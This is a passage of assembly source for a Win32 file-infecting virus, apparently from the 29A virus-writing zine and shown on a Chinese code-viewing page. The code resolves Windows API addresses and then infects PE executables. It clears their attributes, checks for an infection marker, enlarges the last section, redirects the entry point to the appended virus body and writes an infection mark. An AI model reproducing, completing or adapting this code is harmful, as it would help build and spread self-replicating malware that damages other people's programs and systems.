📄 29a-7.014
字号:
lea edi,[ebp+szGetLocalTime]
call GetK32APIAddress
mov dword ptr [ebp+_GetLocalTime],eax
lea edi,[ebp+szCreateThread]
call GetK32APIAddress
mov dword ptr [ebp+_CreateThread],eax
lea edi,[ebp+szSetThreadPriority]
call GetK32APIAddress
mov dword ptr [ebp+_SetThreadPriority],eax
lea edi,[ebp+szResumeThread]
call GetK32APIAddress
mov dword ptr [ebp+_ResumeThread],eax
lea edi,[ebp+szCreateMutexA]
call GetK32APIAddress
mov dword ptr [ebp+_CreateMutexA],eax
lea edi,[ebp+szOpenMutexA]
call GetK32APIAddress
mov dword ptr [ebp+_OpenMutexA],eax
lea edi,[ebp+szSleep]
call GetK32APIAddress
mov dword ptr [ebp+_Sleep],eax
lea edi,[ebp+szGetLogicalDrives]
call GetK32APIAddress
mov dword ptr [ebp+_GetLogicalDrives],eax
lea edi,[ebp+szGetDriveTypeA]
call GetK32APIAddress
mov dword ptr [ebp+_GetDriveTypeA],eax
lea edi,[ebp+szGetFileSize]
call GetK32APIAddress
mov dword ptr [ebp+_GetFileSize],eax
lea edi,[ebp+szCloseHandle]
call GetK32APIAddress
mov dword ptr [ebp+_CloseHandle],eax
lea edi,[ebp+szVirtualAlloc]
call GetK32APIAddress
mov dword ptr [ebp+_VirtualAlloc],eax
;Now we check/load User32.dll for getting functions from it
lea eax,[ebp+szUser32Dll]
push eax
call [ebp+_GetModuleHandleA]
cmp eax,00000000h
jne @_U32Found
lea eax,[ebp+szUser32Dll]
push eax
call [ebp+_LoadLibraryA]
cmp eax,00000000h
je MainEnd
lea eax,[ebp+szUser32Dll]
push eax
call [ebp+_GetModuleHandleA]
cmp eax,00000000h
jne @_U32Found
je MainEnd
@_U32Found:
;now we get useful functions from User32
mov dword ptr [ebp+U32Address],eax
lea eax,[ebp+szMessageBoxA]
push eax
push [ebp+U32Address]
call [ebp+_GetProcAddress]
mov dword ptr [ebp+_MessageBoxA],eax
lea eax,[ebp+szSetWindowTextA]
push eax
push [ebp+U32Address]
call [ebp+_GetProcAddress]
mov dword ptr [ebp+_SetWindowTextA],eax
lea eax,[ebp+szGetTopWindow]
push eax
push [ebp+U32Address]
call [ebp+_GetProcAddress]
mov dword ptr [ebp+_GetTopWindow],eax
lea eax,[ebp+szGetWindow]
push eax
push [ebp+U32Address]
call [ebp+_GetProcAddress]
mov dword ptr [ebp+_GetWindow],eax
ret ; end of looking for all API function addresses we need
GetUsefulAPIz endp
;edi = filename address
InfectFile proc ; function that infects single file
pushad
; initting vars
xor eax,eax
mov dword ptr [ebp+pMemory],eax
mov dword ptr [ebp+FileHandle],eax
mov dword ptr [ebp+FileMappedHandle],eax
; Clearing & storing fileattributes
push edi
call [ebp+_GetFileAttributesA]
mov dword ptr [ebp+FileAttrib],eax
push FILE_ATTRIBUTE_NORMAL
push edi
call [ebp+_SetFileAttributesA]
; File attributes are cleared and stored now...
call [ebp+_CreateFileA],edi,GENERIC_READ or GENERIC_WRITE,0,0,OPEN_EXISTING,0,0
cmp eax,INVALID_HANDLE_VALUE
je @_InfectFailure
mov dword ptr [ebp+FileHandle],eax ; Getting file size, calulating
push 0h
push [ebp+FileHandle]
call [ebp+_GetFileSize] ; new file size, need for mapping it
cmp eax,-1
je @_InfectFailure
mov dword ptr [ebp+FileSize],eax
cmp [ebp+FileSize],3Ch ; we r sure that PE file can't be so small,
jbe @_InfectFailure ; actually it's an additional check of PE validity
; Checking if MZ/PE file and already infected or not
push 0h
push [ebp+FileSize]
push 0h
push PAGE_READONLY
push 0h
push [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
cmp eax,0h
je @_InfectFailure
mov dword ptr [ebp+FileMappedHandle],eax
push 0h
push 0h
push 0h
push FILE_MAP_READ
push [ebp+FileMappedHandle]
call [ebp+_MapViewOfFile]
cmp eax,0h
je @_InfectFailure
mov esi,eax
mov dword ptr [ebp+pMemory],esi
cmp word ptr [esi],IMAGE_DOS_SIGNATURE ; Checking if the file iz valid MZ
jne @_InfectFailure ; executable, if so we are trying
mov eax,dword ptr [esi+03Ch] ; to locate the PE header offset
mov dword ptr [ebp+PEHdrOffset],eax
mov ebx,[ebp+FileSize] ; checking the validy of MZ/PE file
cmp ebx,eax ; by comparing file size and possible
jbe @_InfectFailure ; PE header and start offsets
add esi,eax
xor eax,eax
cmp word ptr [esi],IMAGE_NT_SIGNATURE ; Checking if valid PE, if so,
jne @_InfectFailure ; starting PE header midifications...
; if not, return error
assume esi: ; checking if PE file is already infected or not
mov esi,dword ptr [ebp+pMemory] ; At the end of PE file we put special magic
mov eax,dword ptr [ebp+FileSize] ; bytes,thus generating infection mark
sub eax,12
add esi,eax
cmp dword ptr [esi],0CFED8A8Ah ; magic bytes
jne @InfectionStart
cmp dword ptr [esi+4],0C3CDD8C5h ; magic bytes
jne @InfectionStart
cmp dword ptr [esi+8],8A8ACBC4h ; magic bytes
je @_InfectFailure
; End of checking whether MZ/PE and already infected or not
@InfectionStart:
; Starting infection here
push edi
xor eax,eax
mov eax,dword ptr [ebp+FileSize]
add eax,INFECTLENGTH + 12 ; We store infection mark here in additional 12 bytes
push 0h
push eax
push 0h
push PAGE_READWRITE
push 0h
push [ebp+FileHandle]
call [ebp+_CreateFileMappingA]
cmp eax,0h
je @_InfectFailure
mov dword ptr [ebp+FileMappedHandle],eax
push 0h
push 0h
push 0h
push FILE_MAP_ALL_ACCESS
push [ebp+FileMappedHandle]
call [ebp+_MapViewOfFile]
cmp eax,0h
je @_InfectFailure
mov esi,eax
mov dword ptr [ebp+pMemory],esi
mov eax,dword ptr [esi+03Ch] ; locating the PE header offset
mov dword ptr [ebp+PEHdrOffset],eax ; saving it
add esi,eax ; normalizing the address
xor eax,eax
assume esi: ptr IMAGE_NT_HEADERS
mov ax,[esi].FileHeader.NumberOfSections ; Modifying PE header
mov dword ptr [ebp+SectionsNum],eax ; Getting sections number
mov eax,[esi].OptionalHeader.AddressOfEntryPoint ; Getting entry-point
mov dword ptr [ebp+OldEntryPoint],eax
mov eax,[esi].OptionalHeader.FileAlignment
mov dword ptr [ebp+dFileAlignment],eax
assume esi:
xor eax,eax
mov esi,dword ptr [ebp+pMemory] ; points to file start
add esi,dword ptr [ebp+PEHdrOffset] ; points to PE header start
mov ax,word ptr [esi+14h] ; getting IOH size
add esi,18h ; adding IFH size
add esi,eax ; calculating the overall offset
mov eax,28h ; one section's size=28h
mov ecx,dword ptr [ebp+SectionsNum] ; how many sections
dec ecx
imul ecx ; multiplying, section_num * section_size
add esi,eax ; getting last section's offset
assume esi: ptr IMAGE_SECTION_HEADER
push esi
mov eax,[esi].SVirtualAddress ; will use it later
push eax
mov edx,dword ptr [ebp+FileSize] ; here we calculate SizeOfRawData and save it
sub edx,[esi].PointerToRawData ; for later use
push edx
add edx,INFECTLENGTH ; add infection block (virus) size
mov [esi].SVirtualSize,edx ; save this value in VirtualSize and
mov [esi].SizeOfRawData,edx ; SizeOfRawData fields
mov eax,[esi].SVirtualSize ; starting to calculate new SizeOfImageValue ...
add eax,[esi].SVirtualAddress
assume esi: ; normalze the pointer, so we are at the field that
mov esi,dword ptr [ebp+pMemory] ; we'r gonna modify
add esi,dword ptr [ebp+PEHdrOffset]
assume esi: ptr IMAGE_NT_HEADERS
mov [esi].OptionalHeader.SizeOfImage,eax
pop edx ; restoring SizeOfRawData value
pop eax ; ..and VirtualAddress value
add eax,edx ; add them,and...
mov [esi].OptionalHeader.AddressOfEntryPoint,eax ; we get new entry-point
mov dword ptr [ebp+_EntryPoint],eax ; Another correct way to get the return point to host
pop esi
mov eax,CHARSNEW ; new characteristics for section
mov [esi].SFlags,eax
assume esi:
mov ecx,INFECTLENGTH ; infecting section size
mov edi,dword ptr [ebp+pMemory] ; prepare to add the last section
add edi,dword ptr [ebp+FileSize] ; where to copy
lea eax,[ebp+infect_section] ; getting section's address
mov esi,eax ; setting up destination address
rep movsb ; copying bytes...
; Adding infection mark, encrypted string...
lea esi,[ebp+InfectionMark]
mov ecx,12
rep movsb
; Infection mark added...
pop edi
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -